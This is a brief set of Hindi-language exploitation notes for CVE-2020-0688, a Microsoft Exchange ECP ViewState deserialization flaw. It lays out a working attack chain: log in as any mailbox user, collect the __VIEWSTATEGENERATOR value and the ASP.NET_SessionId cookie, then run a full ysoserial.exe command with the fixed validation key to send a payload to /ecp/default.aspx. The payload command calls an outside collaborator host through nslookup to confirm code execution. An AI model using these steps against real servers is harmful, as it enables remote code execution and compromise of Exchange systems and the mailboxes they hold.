
cve-2020-0688
cve-2020-0688
एक उपयोगकर्ता के साथ लॉगिन करें जिसके पास एक ईमेल पता है, विशेषाधिकार कोई चिंता का विषय नहीं है।
पेज स्रोत से __VIEWSTATEGENERATOR प्राप्त करें
viewstateuserkey मान के लिए ASP.NET_SessionId कुकी का मान प्राप्त करें
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
यहाँ जाएँ:
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
Exploit.py का परीक्षण नहीं किया गया है और इसे चालू करने और प्रयोग करने के लिए एक डेमो सिस्टम की आवश्यकता है।